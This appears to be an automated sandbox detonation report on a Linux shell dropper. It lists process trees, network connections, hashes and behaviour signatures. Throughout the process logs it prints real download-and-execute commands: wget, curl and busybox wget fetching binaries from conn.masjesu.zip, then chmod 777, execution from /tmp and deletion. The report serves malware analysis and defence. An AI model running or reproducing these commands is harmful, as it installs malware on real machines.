[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/chmod
[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/rm
[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/chmod
[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/rm
[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/chmod
[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/rm
[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/chmod
[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT
[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/rm
[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/chmod
[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/rm
[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/chmod
[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB
[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/rm
[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/chmod
[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR
[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/rm
[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/chmod
[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5
[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/rm
[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/chmod
[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey
[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/rm
[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/chmod
[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O
[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/rm
[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/chmod
[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5
[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/rm
[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/chmod
[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/rm
[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/chmod
[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/rm
[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/chmod
[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT
[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/rm
[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/chmod
[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/rm
[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:28
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.9:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:29
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
38s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |